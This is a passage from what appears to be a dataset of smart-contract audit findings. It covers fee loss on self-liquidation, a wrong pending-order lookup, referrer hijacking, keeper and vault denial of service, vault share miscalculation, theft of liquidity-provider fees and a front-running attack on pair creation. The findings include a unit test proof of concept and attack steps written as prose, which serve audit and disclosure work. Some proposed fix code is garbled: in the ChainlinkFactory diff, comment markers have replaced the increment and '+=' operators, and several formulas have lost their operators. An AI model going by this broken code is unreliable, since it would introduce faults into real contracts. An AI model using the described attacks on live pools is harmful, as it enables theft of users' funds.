settlement.\\nThe scenario above is demonstrated in the test, add this to test/unit/market/Market.test.ts:\\n```\\nit('self-liquidation fees lost', async () => {\\nconst POSITION = parse6decimal('100.000')\\nconst COLLATERAL = parse6decimal('120')\\n\\nfunction setupOracle(price: string, timestamp : number, nextTimestamp : number) {\\n const oracleVersion = {\\n price: parse6decimal(price),\\n timestamp: timestamp,\\n valid: true,\\n }\\n oracle.at.whenCalledWith(oracleVersion.timestamp).returns(oracleVersion)\\n oracle.status.returns([oracleVersion, nextTimestamp])\\n oracle.request.returns()\\n}\\n\\ndsu.transferFrom.whenCalledWith(user.address, market.address, COLLATERAL.mul(1e12)).returns(true)\\ndsu.transferFrom.whenCalledWith(userB.address, market.address, COLLATERAL.mul(1e12)).returns(true)\\n\\nvar time = TIMESTAMP;\\n\\nsetupOracle('1', time, time + 100);\\nawait market.connect(user)\\n ['update(address,uint256,uint256,uint256,int256,bool)'](user.address, POSITION, 0, 0, COLLATERAL, false);\\n\\ntime += 100;\\nsetupOracle('1', time, time + 100);\\nawait market.connect(userB)\\n ['update(address,uint256,uint256,uint256,int256,bool)'](userB.address, 0, POSITION, 0, COLLATERAL, false);\\n\\ntime += 100;\\nsetupOracle('1', time, time + 100);\\n\\ntime += 100;\\nsetupOracle('0.7', time, time + 100);\\n\\n// self-liquidate\\nsetupOracle('0.7', time, time + 100);\\nawait market.connect(userB)\\n ['update(address,uint256,uint256,uint256,int256,bool)'](userB.address, 0, 0, 0, 0, true);\\n\\n// settle liquidation\\ntime += 100;\\nsetupOracle('0.7', time, time + 100);\\nawait market.settle(userB.address);\\nvar info = await market.locals(userB.address);\\nconsole.log(\"Claimable userB: \" + info.claimable);\\n```\\n\\nConsole log:\\n```\\nClaimable userB: 0\\n```\\nчModify `Market._credit` function to increase `context.local.claimable` if account to be credited matches account which is being updated.чIf user self-liquidates or self-refers, the liquidation and referral fees are lost by the user (and are stuck in the contract, because they're still subtracted from the user's collateral).ч```\\n// rest of code\\n _credit(liquidators[account][newOrderId], accumulationResult.liquidationFee);\\n _credit(referrers[account][newOrderId], accumulationResult.subtractiveFee);\\n// rest of code\\nfunction _credit(address account, UFixed6 amount) private {\\n if (amount.isZero()) return;\\n\\n Local memory newLocal = _locals[account].read();\\n newLocal.credit(amount);\\n _locals[account].store(newLocal);\\n}\\n```\\n -_loadContext() uses the wrong pendingGlobal.чmediumч`StrategyLib._loadContext()` is using the incorrect `pendingGlobal`, causing `currentPosition`, `minPosition`, and `maxPosition` to be incorrect, leading to incorrect rebalance operation.\\nIn `StrategyLib._loadContext()`, there is a need to compute `currentPosition`, `minPosition`, and `maxPosition`. The code as follows:\\n```\\n function _loadContext(\\n Registration memory registration\\n ) private view returns (MarketStrategyContext memory marketContext) {\\n// rest of code\\n // current position\\n Order memory pendingGlobal = registration.market.pendings(address(this));\\n marketContext.currentPosition = registration.market.position();\\n marketContext.currentPosition.update(pendingGlobal);\\n marketContext.minPosition = marketContext.currentAccountPosition.maker\\n .unsafeSub(marketContext.currentPosition.maker\\n .unsafeSub(marketContext.currentPosition.skew().abs()).min(marketContext.closable));\\n marketContext.maxPosition = marketContext.currentAccountPosition.maker\\n .add(marketContext.riskParameter.makerLimit.unsafeSub(marketContext.currentPosition.maker));\\n }\\n```\\n\\nThe code above `pendingGlobal = registration.market.pendings(address(this));` is wrong It takes the address(this)'s `pendingLocal`. The correct approach is to use `pendingGlobal = registration.market.pending();`.ч```\\n function _loadContext(\\n Registration memory registration\\n ) private view returns (MarketStrategyContext memory marketContext) {\\n// rest of code\\n // current position\\n// Remove the line below\\n Order memory pendingGlobal = registration.market.pendings(address(this));\\n// Add the line below\\n Order memory pendingGlobal = registration.market.pending();\\n marketContext.currentPosition = registration.market.position();\\n marketContext.currentPosition.update(pendingGlobal);\\n marketContext.minPosition = marketContext.currentAccountPosition.maker\\n .unsafeSub(marketContext.currentPosition.maker\\n .unsafeSub(marketContext.currentPosition.skew().abs()).min(marketContext.closable));\\n marketContext.maxPosition = marketContext.currentAccountPosition.maker\\n .add(marketContext.riskParameter.makerLimit.unsafeSub(marketContext.currentPosition.maker));\\n }\\n```\\nчSince `pendingGlobal` is wrong, `currentPosition`, `minPosition` and `maxPosition` are all wrong. affects subsequent rebalance calculations, such as `target.position` etc. rebalance does not work properlyч```\\n function _loadContext(\\n Registration memory registration\\n ) private view returns (MarketStrategyContext memory marketContext) {\\n// rest of code\\n // current position\\n Order memory pendingGlobal = registration.market.pendings(address(this));\\n marketContext.currentPosition = registration.market.position();\\n marketContext.currentPosition.update(pendingGlobal);\\n marketContext.minPosition = marketContext.currentAccountPosition.maker\\n .unsafeSub(marketContext.currentPosition.maker\\n .unsafeSub(marketContext.currentPosition.skew().abs()).min(marketContext.closable));\\n marketContext.maxPosition = marketContext.currentAccountPosition.maker\\n .add(marketContext.riskParameter.makerLimit.unsafeSub(marketContext.currentPosition.maker));\\n }\\n```\\n -Liquidator can set up referrals for other usersчmediumчIf a user has met the liquidation criteria and currently has no referrer then a malicious liquidator can specify a referrer in the liquidation order. making it impossible for subsequent users to set up the referrer they want.\\nCurrently, there are 2 conditions to set up a referrer\\nthe order cannot be empty (Non-empty orders require authorization unless they are liquidation orders)\\nthere can't be another referrer already\\n```\\n function _loadUpdateContext(\\n Context memory context,\\n address account,\\n address referrer\\n ) private view returns (UpdateContext memory updateContext) {\\n// rest of code\\n updateContext.referrer = referrers[account][context.local.currentId];\\n updateContext.referralFee = IMarketFactory(address(factory())).referralFee(referrer);\\n }\\n\\n function _processReferrer(\\n UpdateContext memory updateContext,\\n Order memory newOrder,\\n address referrer\\n ) private pure {\\n if (newOrder.makerReferral.isZero() && newOrder.takerReferral.isZero()) return;\\n if (updateContext.referrer == address(0)) updateContext.referrer = referrer;\\n if (updateContext.referrer == referrer) return;\\n\\n revert MarketInvalidReferrerError();\\n }\\n\\n\\n function _storeUpdateContext(Context memory context, UpdateContext memory updateContext, address account) private {\\n// rest of code\\n referrers[account][context.local.currentId] = updateContext.referrer;\\n }\\n```\\n\\nHowever, if the user does not have a referrer, the liquidation order is able to meet both of these restrictions\\nThis allows the liquidator to set up referrals for other users.\\nWhen the user subsequently tries to set up a referrer, it will fail.чRestrictions on Liquidation Orders Cannot Set a referrer\\n```\\n function _processReferrer(\\n UpdateContext memory updateContext,\\n Order memory newOrder,\\n address referrer\\n ) private pure {\\n// Add the line below\\n if (newOrder.protected() && referrer != address(0)) revert MarketInvalidReferrerError;\\n if (newOrder.makerReferral.isZero() && newOrder.takerReferral.isZero()) return;\\n if (updateContext.referrer == address(0)) updateContext.referrer = referrer;\\n if (updateContext.referrer == referrer) return;\\n\\n revert MarketInvalidReferrerError();\\n }\\n```\\nчIf a user is set up as a referrer by a liquidated order in advance, the user cannot be set up as anyone else.ч```\\n function _loadUpdateContext(\\n Context memory context,\\n address account,\\n address referrer\\n ) private view returns (UpdateContext memory updateContext) {\\n// rest of code\\n updateContext.referrer = referrers[account][context.local.currentId];\\n updateContext.referralFee = IMarketFactory(address(factory())).referralFee(referrer);\\n }\\n\\n function _processReferrer(\\n UpdateContext memory updateContext,\\n Order memory newOrder,\\n address referrer\\n ) private pure {\\n if (newOrder.makerReferral.isZero() && newOrder.takerReferral.isZero()) return;\\n if (updateContext.referrer == address(0)) updateContext.referrer = referrer;\\n if (updateContext.referrer == referrer) return;\\n\\n revert MarketInvalidReferrerError();\\n }\\n\\n\\n function _storeUpdateContext(Context memory context, UpdateContext memory updateContext, address account) private {\\n// rest of code\\n referrers[account][context.local.currentId] = updateContext.referrer;\\n }\\n```\\n -Vault and oracle keepers DoS in some situations due to `market.update(account,max,max,max,0,false)`чmediumчWhen user's market account is updated without position and collateral change (by calling market.update(account,max,max,max,0,false)), this serves as some kind of \"settling\" the account (which was the only way to settle the account before v2.3). However, this action still reverts if the account is below margin requirement.\\nThe issue is that some parts of the code use this action to \"settle\" the account in the assumption that it never reverts which is not true. This causes unpexpected reverts and denial of service to users who can not execute transactions in some situations, in particular:\\nOracle `KeeperFactory.settle` uses this method to settle all accounts in the market for the oracle verison and will revert entire market version's settlement if any account which is being settled is below margin requirement. Example scenario: 1.1. User increases position to the edge of margin requirement 1.2. The price rises slightly for the commited oracle version, and user position is settled and is now slightly below margin requirements 1.3. All attempts to settle accounts for the commited oracle version for this market will revert as user's account collateral is below margin requirements.\\nVault `Vault._updateUnderlying` uses this method to settle all vault's accounts in the markets. This function is called at the start of `rebalance` and `update`, with `rebalance` also being called before any admin vault parameters changes such as updating market leverages, weights or cap. This becomes especially problematic if any market is \"removed\" from the vault by setting its weight to 0, but the market still has some position due to `minPosition` limitation (as described in another issue). In such case each vault `update` will bring this market's position to exact edge of margin requirement, meaning a lot of times minimal price changes will put the vault's market account below margin requirement, and as such most Vault functions will revert (update, `rebalance` and admin param changes). Moreover, since the vault rebalances collateral and/or position size only in `_manage` (which is called only from `update` and rebalance), this means that the vault is basically bricked until this position is either liquidated or goes above margin requirement again due to price changes.\\nWhen `Market.update` is called, any parameters except `protected = true` will perform the following check from the InvariantLib.validate:\\n```\\nif (\\n !PositionLib.margined(\\n context.latestPosition.local.magnitude().add(context.pending.local.pos()),\\n context.latestOracleVersion,\\n context.riskParameter,\\n context.local.collateral\\n )\\n) revert IMarket.MarketInsufficientMarginError();\\n```\\n\\nThis means that even updates which do not change anything (empty order and 0 collateral change) still perform this check and revert if the user's collateral is below margin requirement.\\nSuch method to settle accounts is used in KeeperOracle._settle:\\n```\\nfunction _settle(IMarket market, address account) private {\\n market.update(account, UFixed6Lib.MAX, UFixed6Lib.MAX, UFixed6Lib.MAX, Fixed6Lib.ZERO, false);\\n}\\n```\\n\\nThis is called from `KeeperFactory.settle`, which the keepers are supposed to call to settle market accounts after the oracle version is commited. This will revert, thus keepers will temporarily be unable to call this function for the specific oracle version until all users are at or above margin.\\nThe same method is used to settle accounts in Vault._updateUnderlying:\\n```\\nfunction _updateUnderlying() private {\\n for (uint256 marketId; marketId < totalMarkets; marketId++)\\n _registrations[marketId].read().market.update(\\n address(this),\\n UFixed6Lib.MAX,\\n UFixed6Lib.ZERO,\\n UFixed6Lib.ZERO,\\n Fixed6Lib.ZERO,\\n false\\n );\\n}\\n```\\nчDepending on intended functionality:\\nIgnore the margin requirement for empty orders and collateral change which is >= 0. AND/OR\\nUse `Market.settle` instead of `Market.update` to `settle` accounts, specifically in `KeeperOracle._settle` and in `Vault._updateUnderlying`. There doesn't seem to be any reason or issue to use `settle` instead of `update`, it seems that `update` is there just because there was no `settle` function available before.чKeepers are unable to settle market accounts for the commited oracle version until all accounts are above margin. The oracle fees are still taken from all accounts, but the keepers are blocked from receiving it.\\nIf any Vault's market weight is set to 0 (or if vault's position in any market goes below margin for whatever other reason), most of the time the vault will temporarily be bricked until vault's position in that market is liquidated. The only function working in this state is `Vault.settle`, even all admin functions will revert.ч```\\nif (\\n !PositionLib.margined(\\n context.latestPosition.local.magnitude().add(context.pending.local.pos()),\\n context.latestOracleVersion,\\n context.riskParameter,\\n context.local.collateral\\n )\\n) revert IMarket.MarketInsufficientMarginError();\\n```\\n -Vault checkpoints slightly incorrect conversion from assets to shares leads to slow loss of funds for long-time vault depositorsчmediumчWhen vault checkpoints convert assets to shares (specifically used to calculate user's shares for their deposit), it uses the following formula: `shares = (assets[before fee] - settlementFee) * checkpoint.shares/checkpoint.assets * (deposit + redeem - tradeFee) / (deposit + redeem)`\\n`settlementFee` in this formula is taken into account slightly incorrectly: in actual market collateral calculations, both settlement fee and trade fee are subtracted from collateral, but this formula basically multiplies `1 - settlement fee percentage` by `1 - trade fee percentage`, which is slightly different and adds the calculation error = `settlement fee percentage * trade fee percentage`.\\nThis is the scenario to better understand the issue:\\nLinear fee = 2%, settlement fee = $1\\nUser1 deposits $100 into the vault (linear fee = $2, settlement fee = $1)\\nVault assets = $97 (due to fees), User1 shares = 100\\nUser2 deposits $100 into the vault (linear fee = $2, settlement fee = $1)\\nVault assets = $194, User1 shares = 100, but User2 shares = 100.02, meaning User1's share value has slightly fallen due to a later deposit.\\nThis is the calculation for User2 shares: `shares = ($100 - $1) * 100/$97 * ($100 - $2) / $100 = $99 * 100/$97 * $98/$100 = $99 * 98/$97 = 100.02`\\nThe extra 0.02 this user has received is because the `tradeFee` is taken from the amount after settlement fee ($99) rather than full amount as it should ($100). This difference (settlementFee * `tradeFee` = $0.02) is unfair amount earned by User2 and loss of funds for User1.\\nWhen redeeming, the formula for shares -> assets vault checkpoint conversion is correct and the correct amount is redeemed.\\nThis issue leads to all vault depositors slowly losing share value with each deposit, and since no value is gained when redeeming, continuous deposits and redeems will lead to all long-time depositors continuously losing their funds.\\nThis is the formula for vault checkpoint toSharesGlobal:\\n```\\nfunction toSharesGlobal(Checkpoint memory self, UFixed6 assets) internal pure returns (UFixed6) {\\n // vault is fresh, use par value\\n if (self.shares.isZero()) return assets;\\n\\n // if vault is insolvent, default to par value\\n return self.assets.lte(Fixed6Lib.ZERO) ? assets : _toShares(self, _withoutSettlementFeeGlobal(self, assets));\\n}\\n\\nfunction _toShares(Checkpoint memory self, UFixed6 assets) private pure returns (UFixed6) {\\n UFixed6 selfAssets = UFixed6Lib.unsafeFrom(self.assets);\\n return _withSpread(self, assets.muldiv(self.shares, selfAssets));\\n}\\n\\nfunction _withSpread(Checkpoint memory self, UFixed6 amount) private pure returns (UFixed6) {\\n UFixed6 selfAssets = UFixed6Lib.unsafeFrom(self.assets);\\n UFixed6 totalAmount = self.deposit.add(self.redemption.muldiv(selfAssets, self.shares));\\n UFixed6 totalAmountIncludingFee = UFixed6Lib.unsafeFrom(Fixed6Lib.from(totalAmount).sub(self.tradeFee));\\n\\n return totalAmount.isZero() ?\\n amount :\\n amount.muldiv(totalAmountIncludingFee, totalAmount);\\n}\\n\\nfunction _withoutSettlementFeeGlobal(Checkpoint memory self, UFixed6 amount) private pure returns (UFixed6) {\\n return _withoutSettlementFee(amount, self.settlementFee);\\n}\\n\\nfunction _withoutSettlementFee(UFixed6 amount, UFixed6 settlementFee) private pure returns (UFixed6) {\\n return amount.unsafeSub(settlementFee);\\n}\\n```\\n\\nThis code translates to a formula shown above, i.e. it first subtracts settlement fee from the assets (withoutSettlementFeeGlobal), then multiplies this by checkpoint's share value in `_toShares` (*checkpoint.shares/checkpoint.assets), and then multiplies this by trade fee adjustment in `_withSpread` (*(deposit+redeem-tradeFee) / (deposit+redeem)). Here is the formula again: `shares = (assets[before fee] - settlementFee) * checkpoint.shares/checkpoint.assets * (deposit + redeem - tradeFee) / (deposit + redeem)`\\nAs shown above, the formula is incorrect, because it basically does the following: `user_assets = (deposit - settlementFee) * (deposit - tradeFee)/deposit = deposit * (1 - settlementFeePct) * (1 - tradeFeePct)`\\nBut the actual user collateral after fees is calculated as: `user_assets = deposit - settlementFee - tradeFee = deposit * (1 - settlementFeePct - tradeFeePct)`\\nIf we subtract the actual collateral from the formula used in checkpoint, we get the error: `error = deposit * ((1 - settlementFeePct) * (1 - tradeFeePct) - (1 - settlementFeePct - tradeFeePct))` `error = deposit * settlementFeePct * tradeFeePct` `error = settlementFee * tradeFeePct`\\nSo this is systematic error, which inflates the shares given to users with any deposit by fixed amount of `settlementFee * tradeFeePct`чRe-work the assets to shares conversion in vault checkpoint to use the correct formula: `shares = (assets[before fee] - settlementFee - tradeFee * assets / (deposit + redeem)) * checkpoint.shares/checkpoint.assets`чAny vault deposit reduces the vault assets by `settlementFee * tradeFeePct`. While this amount is not very large (in the order of $0.1 - $0.001 per deposit transaction), this is amount lost with each deposit, and given that an active vault can easily have 1000s of transactions daily, this will be a loss of $1-$100/day, which is significant enough to make it a valid issue.ч```\\nfunction toSharesGlobal(Checkpoint memory self, UFixed6 assets) internal pure returns (UFixed6) {\\n // vault is fresh, use par value\\n if (self.shares.isZero()) return assets;\\n\\n // if vault is insolvent, default to par value\\n return self.assets.lte(Fixed6Lib.ZERO) ? assets : _toShares(self, _withoutSettlementFeeGlobal(self, assets));\\n}\\n\\nfunction _toShares(Checkpoint memory self, UFixed6 assets) private pure returns (UFixed6) {\\n UFixed6 selfAssets = UFixed6Lib.unsafeFrom(self.assets);\\n return _withSpread(self, assets.muldiv(self.shares, selfAssets));\\n}\\n\\nfunction _withSpread(Checkpoint memory self, UFixed6 amount) private pure returns (UFixed6) {\\n UFixed6 selfAssets = UFixed6Lib.unsafeFrom(self.assets);\\n UFixed6 totalAmount = self.deposit.add(self.redemption.muldiv(selfAssets, self.shares));\\n UFixed6 totalAmountIncludingFee = UFixed6Lib.unsafeFrom(Fixed6Lib.from(totalAmount).sub(self.tradeFee));\\n\\n return totalAmount.isZero() ?\\n amount :\\n amount.muldiv(totalAmountIncludingFee, totalAmount);\\n}\\n\\nfunction _withoutSettlementFeeGlobal(Checkpoint memory self, UFixed6 amount) private pure returns (UFixed6) {\\n return _withoutSettlementFee(amount, self.settlementFee);\\n}\\n\\nfunction _withoutSettlementFee(UFixed6 amount, UFixed6 settlementFee) private pure returns (UFixed6) {\\n return amount.unsafeSub(settlementFee);\\n}\\n```\\n -ChainlinkFactory will pay non-requested versions keeper feesчmediumчProtocol definition: `Requested versions will pay out a keeper fee, non-requested versions will not.` But ChainlinkFactory ignores `numRequested`, which pays for both.\\nProtocol definition: `Requested versions will pay out a keeper fee, non-requested versions will not.`\\n```\\n /// @notice Commits the price to specified version\\n /// @dev Accepts both requested and non-requested versions.\\n /// Requested versions will pay out a keeper fee, non-requested versions will not.\\n /// Accepts any publish time in the underlying price message, as long as it is within the validity window,\\n /// which means its possible for publish times to be slightly out of order with respect to versions.\\n /// Batched updates are supported by passing in a list of price feed ids along with a valid batch update data.\\n /// @param ids The list of price feed ids to commit\\n /// @param version The oracle version to commit\\n /// @param data The update data to commit\\n function commit(bytes32[] memory ids, uint256 version, bytes calldata data) external payable {\\n```\\n\\ncommit()->_handleKeeperFee()->_applicableValue() `ChainlinkFactory._applicableValue ()` implements the following:\\n```\\n function _applicableValue(uint256, bytes memory data) internal view override returns (uint256) {\\n bytes[] memory payloads = abi.decode(data, (bytes[]));\\n uint256 totalFeeAmount = 0;\\n for (uint256 i = 0; i < payloads.length; i++) {\\n (, bytes memory report) = abi.decode(payloads[i], (bytes32[3], bytes));\\n (Asset memory fee, ,) = feeManager.getFeeAndReward(address(this), report, feeTokenAddress);\\n totalFeeAmount += fee.amount;\\n }\\n return totalFeeAmount;\\n }\\n```\\n\\nThe above method ignores the first parameter `numRequested`. This way, whether it is `Requested versions` or not, you will pay `keeper fees`. Violating `non-requested versions will not pay`чIt is recommended that only `Requested versions` keeper fees'\\n```\\n// Remove the line below\\n function _applicableValue(uint256 , bytes memory data) internal view override returns (uint256) {\\n// Add the line below\\n function _applicableValue(uint256 numRequested, bytes memory data) internal view override returns (uint256) {\\n bytes[] memory payloads = abi.decode(data, (bytes[]));\\n uint256 totalFeeAmount = 0;\\n for (uint256 i = 0; i < payloads.length; i// Add the line below\\n// Add the line below\\n) {\\n (, bytes memory report) = abi.decode(payloads[i], (bytes32[3], bytes));\\n (Asset memory fee, ,) = feeManager.getFeeAndReward(address(this), report, feeTokenAddress);\\n totalFeeAmount // Add the line below\\n= fee.amount;\\n }\\n// Remove the line below\\n return totalFeeAmount;\\n// Add the line below\\n return totalFeeAmount * numRequested / payloads.length ;\\n }\\n```\\nчIf `non-requested versions` will pay as well, it is easy to maliciously submit `non-requested` maliciously consume `ChainlinkFactory` fees balance (Note that needs at least one numRequested to call `_handleKeeperFee()` )ч```\\n /// @notice Commits the price to specified version\\n /// @dev Accepts both requested and non-requested versions.\\n /// Requested versions will pay out a keeper fee, non-requested versions will not.\\n /// Accepts any publish time in the underlying price message, as long as it is within the validity window,\\n /// which means its possible for publish times to be slightly out of order with respect to versions.\\n /// Batched updates are supported by passing in a list of price feed ids along with a valid batch update data.\\n /// @param ids The list of price feed ids to commit\\n /// @param version The oracle version to commit\\n /// @param data The update data to commit\\n function commit(bytes32[] memory ids, uint256 version, bytes calldata data) external payable {\\n```\\n -Liquidity provider fees can be stolen from any pairчhighчAn attacker can steal the liquidiy providers fees by transfering liquidity tokens to the pair and then withdrawing fees on behalf of the pair itself.\\nThis is possible because of two reasons:\\nTransfering liquidity tokens to the pair itself doesn't update the fee tracking variables:\\n```\\nif (to != address(this)) {\\n _updateFeeRewards(to);\\n}\\n```\\n\\nwhich results in the variable `feesPerTokenPaid[address(pair)]` of the pair being equal to 0.\\nThe function withdrawFees() is a permissionless function that allows to withdraw fees on behalf of any address, including the pair itself.\\nBy combining this two quirks of the codebase an attacker can steal all of the currently pending liquidity provider fees by doing the following:\\nAdd liquidity to a pair, which will mint the attacker some liquidity tokens\\nTransfer the liquidity tokens to the pair directly\\nCall withdrawFees() by passing the address of the pair. Because `feesPerTokenPaid[address(pair)]` is 0 this will collect fees on behalf of the pair even if it shouldn't. The function will transfer an amount `x` of WETH from the pair to the pair itself and will lower the `_pendingLiquidityFee` variable by that same amount\\nBecause the variable `_pendingLiquidityFee` has been lowered by `x` the pool will assume someone transferred `x` WETH to it\\nAt this point the attacker can take advantage of this however he likes, but for the sake of the example let's suppose he calls swap() to swap `x` ETH into tokens that will be transferred to his wallet\\nThe attacker burns the liquidity transferred at point `2` to recover his funds\\nPOC\\nчIn withdrawFees(pair) add a require statement to prevent fees being withdrawn on behalf of the pool.\\n```\\nrequire(to != address(this));\\n```\\nчLiquidity provider fees can be stolen from any pair.ч```\\nif (to != address(this)) {\\n _updateFeeRewards(to);\\n}\\n```\\n -Some unusual problems arise in the use of the `GoatV1Factory.sol#createPair()` function.чmediumчIf you create a new pool for tokens and add liquidity using the `GoatRouterV1.sol#addLiquidity()` function, the bootstrap function of the protocol is broken. Therefore, an attacker can perform the front running attack on the `GoatRouterV1.sol#addLiquidity()` function by front calling `GoatV1Factory.sol#createPair()`.\\nIf a pool for the token does not exist, the LP can create a new pool using the `GoatV1Factory.sol#createPair()` function. Next he calls `GoatRouterV1.sol#addLiquidity()` to provide liquidity. At this time, the amount of WETH and ERC20Token provided to the pool is calculated in the `GoatRouterV1.sol#_addLiquidity()` function.\\n```\\n function _addLiquidity(\\n address token,\\n uint256 tokenDesired,\\n uint256 wethDesired,\\n uint256 tokenMin,\\n uint256 wethMin,\\n GoatTypes.InitParams memory initParams\\n ) internal returns (uint256, uint256, bool) {\\n GoatTypes.LocalVariables_AddLiquidity memory vars;\\n GoatV1Pair pair = GoatV1Pair(GoatV1Factory(FACTORY).getPool(token));\\n if (address(pair) == address(0)) {\\n // First time liquidity provider\\n pair = GoatV1Pair(GoatV1Factory(FACTORY).createPair(token, initParams));\\n vars.isNewPair = true;\\n }\\n\\n if (vars.isNewPair) {\\n// rest of codeSNIP\\n } else {\\n /**\\n * @dev This block is accessed after the presale period is over and the pool is converted to AMM\\n */\\n (uint256 wethReserve, uint256 tokenReserve) = pair.getReserves();\\n uint256 tokenAmountOptimal = GoatLibrary.quote(wethDesired, wethReserve, tokenReserve);\\n if (tokenAmountOptimal <= tokenDesired) {\\n if (tokenAmountOptimal < tokenMin) {\\n revert GoatErrors.InsufficientTokenAmount();\\n }\\n (vars.tokenAmount, vars.wethAmount) = (tokenAmountOptimal, wethDesired);\\n } else {\\n uint256 wethAmountOptimal = GoatLibrary.quote(tokenDesired, tokenReserve, wethReserve);\\n assert(wethAmountOptimal <= wethDesired);\\n if (wethAmountOptimal < wethMin) revert GoatErrors.InsufficientWethAmount();\\n (vars.tokenAmount, vars.wethAmount) = (tokenDesired, wethAmountOptimal);\\n }\\n }\\n return (vars.tokenAmount, vars.wethAmount, vars.isNewPair);\\n }\\n```\\n\\nFor simplicity, let's only consider from #L250 to #L256.\\nL250:wethReserve = virtualEth, tokenReserve = initialTokenMatch - (initialTokenMatch - ((virtualEth * initialTokenMatch)/(virtualEth + bootstrapEth)) + + (virtualEthinitialTokenMatchbootstrapEth)/(virtualEth + bootstrapEth) ^ 2) = = ((virtualEth * initialTokenMatch)/(virtualEth + bootstrapEth)) - (virtualEthinitialTokenMatchbootstrapEth)/(virtualEth + bootstrapEth) ^ 2 L251:tokenAmountOptimal = wethDesired * wethReserve / tokenReserve vars.tokenAmount = tokenAmountOptimal vars.wethAmount = wethDesired\\nAt this time, At this time, the calculated balance of ETH and token is sent to the pool, and `GoatV1Pair(vars.pair).mint()` is called in the `GoatRouterV1.sol#addLiquidity()` function.\\n```\\n function addLiquidity(\\n address token,\\n uint256 tokenDesired,\\n uint256 wethDesired,\\n uint256 tokenMin,\\n uint256 wethMin,\\n address to,\\n uint256 deadline,\\n GoatTypes.InitParams memory initParams\\n ) external nonReentrant ensure(deadline) returns (uint256, uint256, uint256) {\\n// rest of codeSNIP\\n IERC20(vars.token).safeTransferFrom(msg.sender, vars.pair, vars.actualTokenAmount);\\n if (vars.wethAmount != 0) {\\n IERC20(WETH).safeTransferFrom(msg.sender, vars.pair, vars.wethAmount);\\n }\\n vars.liquidity = GoatV1Pair(vars.pair).mint(to);\\n// rest of codeSNIP\\n }\\n```\\n\\nNext, the `GoatV1Pair(vars.pair).mint()` function checks the validity of the transmitted token.\\n```\\n function mint(address to) external nonReentrant returns (uint256 liquidity) {\\n // rest of codeSNIP\\n if (_vestingUntil == _MAX_UINT32) {\\n // Do not allow to add liquidity in presale period\\n if (totalSupply_ > 0) revert GoatErrors.PresalePeriod();\\n // don't allow to send more eth than bootstrap eth\\n if (balanceEth > mintVars.bootstrapEth) {\\n revert GoatErrors.SupplyMoreThanBootstrapEth();\\n }\\n\\n if (balanceEth < mintVars.bootstrapEth) {\\n (uint256 tokenAmtForPresale, uint256 tokenAmtForAmm) = _tokenAmountsForLiquidityBootstrap(\\n mintVars.virtualEth, mintVars.bootstrapEth, balanceEth, mintVars.initialTokenMatch\\n );\\n if (balanceToken != (tokenAmtForPresale + tokenAmtForAmm)) {\\n revert GoatErrors.InsufficientTokenAmount();\\n }\\n liquidity =\\n Math.sqrt(uint256(mintVars.virtualEth) * uint256(mintVars.initialTokenMatch)) - MINIMUM_LIQUIDITY;\\n } else {\\n // This means that user is willing to make this pool an amm pool in first liquidity mint\\n liquidity = Math.sqrt(balanceEth * balanceToken) - MINIMUM_LIQUIDITY;\\n uint32 timestamp = uint32(block.timestamp);\\n _vestingUntil = timestamp + VESTING_PERIOD;\\n }\\n mintVars.isFirstMint = true;\\n }\\n // rest of codeSNIP\\n }\\n```\\n\\nIn here, `balanceToken = vars.tokenAmount (value:tokenAmountOptimal)` and `tokenAmtForPresale + tokenAmtForAmm` is calculated follows.\\ntokenAmtForPresale = initialTokenMatch - (virtualEth * initialTokenMatch / (virtualEth + bootstrapEth)) - - (balanceEth(value:wethDesired)*initialTokenMatch/(virtualEth+balanceEth)) tokenAmtForAmm = (virtualEth * initialTokenMatch * bootstrapEth) / (virtualEth + bootstrapEth) ^ 2\\nAs a result, `(balanceToken != (tokenAmtForPresale + tokenAmtForAmm)) == true`, the `GoatRouterV1.sol#addLiquidity()` function is reverted. In this case, If the initial LP want to provide liquidity to the pool, he must pay an amount of WETH equivalent to bootstrapEth to execute #L146. As a result, the bootstrap function is broken.\\nBased on this fact, an attacker can front run the `createPair()` function if he finds the `addLiquidity()` function in the mempool.чIt is recommended that the `GoatV1Factory.sol#.createPair()` function be called only from the `GoatRouterV1` contract.чThe bootstrap function of the protocol is broken and the initial LP must pay an amount of WETH equivalent to bootstrapEth.ч```\\n function _addLiquidity(\\n address token,\\n uint256 tokenDesired,\\n uint256 wethDesired,\\n uint256 tokenMin,\\n uint256 wethMin,\\n GoatTypes.InitParams memory initParams\\n ) internal returns (uint256, uint256, bool) {\\n GoatTypes.LocalVariables_AddLiquidity memory vars;\\n GoatV1Pair pair = GoatV1Pair(GoatV1Factory(FACTORY).getPool(token));\\n if (address(pair) == address(0)) {\\n // First time liquidity provider\\n pair = GoatV1Pair(GoatV1Factory(FACTORY).createPair(token, initParams));\\n vars.isNewPair = true;\\n }\\n\\n if (vars.isNewPair) {\\n// rest of codeSNIP\\n } else {\\n /**\\n * @dev This block is accessed after the presale period is over and the pool is converted to AMM\\n */\\n (uint256 wethReserve, uint256 tokenReserve) = pair.getReserves();\\n uint256 tokenAmountOptimal = GoatLibrary.quote(wethDesired, wethReserve, tokenReserve);\\n if (tokenAmountOptimal <= tokenDesired) {\\n if (tokenAmountOptimal < tokenMin) {\\n revert GoatErrors.InsufficientTokenAmount();\\n }\\n (vars.tokenAmount, vars.wethAmount) = (tokenAmountOptimal, wethDesired);\\n } else {\\n uint256 wethAmountOptimal = GoatLibrary.quote(tokenDesired, tokenReserve, wethReserve);\\n assert(wethAmountOptimal <= wethDesired);\\n if (wethAmountOptimal < wethMin) revert GoatErrors.InsufficientWethAmount();\\n (vars.tokenAmount, vars.wethAmount) = (tokenDesired, wethAmountOptimal);\\n }\\n }\\n return (vars.tokenAmount, vars.wethAmount, vars.isNewPair);\\n }\\n```\\n -No check for `initialEth` in `GoatV1Pair.takeOverPool()`.чmediumчGoatV1Pair.takeOverPool() only checks the amount of `token` for initialization, not `initialETH`.\\n```\\n function takeOverPool(GoatTypes.InitParams memory initParams) external {\\n if (_vestingUntil != _MAX_UINT32) {\\n revert GoatErrors.ActionNotAllowed();\\n }\\n\\n GoatTypes.InitialLPInfo memory initialLpInfo = _initialLPInfo;\\n\\n GoatTypes.LocalVariables_TakeOverPool memory localVars;\\n address to = msg.sender;\\n localVars.virtualEthOld = _virtualEth;\\n localVars.bootstrapEthOld = _bootstrapEth;\\n localVars.initialTokenMatchOld = _initialTokenMatch;\\n\\n (localVars.tokenAmountForPresaleOld, localVars.tokenAmountForAmmOld) = _tokenAmountsForLiquidityBootstrap(\\n localVars.virtualEthOld,\\n localVars.bootstrapEthOld,\\n initialLpInfo.initialWethAdded,\\n localVars.initialTokenMatchOld\\n );\\n\\n // new token amount for bootstrap if 